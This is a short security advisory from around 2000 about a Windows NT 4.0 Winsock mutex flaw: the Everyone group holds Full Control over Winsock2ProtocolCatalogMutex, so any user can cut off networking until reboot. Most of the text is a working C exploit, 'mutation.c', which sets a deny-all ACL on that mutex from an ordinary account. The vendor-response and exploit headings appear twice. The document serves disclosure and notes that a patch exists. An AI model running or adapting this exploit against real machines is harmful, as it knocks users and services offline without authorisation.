Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below
There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to which the Everyone group has Full Control. Any user can change this to No Access, and that disables all network connectivity through Winsock until the system is rebooted.
Vendor Response:
Microsoft has released a patch and you can read more about it in their Security Bulletin.
Sample exploit code:
Vendor Response:
Microsoft has released a patch and you can read more about it in their Security Bulletin.
Sample exploit code:
/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/* http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/
#include <windows.h>
#include <aclapi.h>
int main(void)
{
PSID pEveryoneSID;
SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
PACL pDacl;
DWORD sizeNeeded;
AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0,
0, 0, 0, 0, &pEveryoneSID);
sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
GetLengthSid(pEveryoneSID) - sizeof(DWORD);
pDacl = (PACL) malloc(sizeNeeded);
InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL,
pDacl, NULL);
free(pDacl);
return 0;
}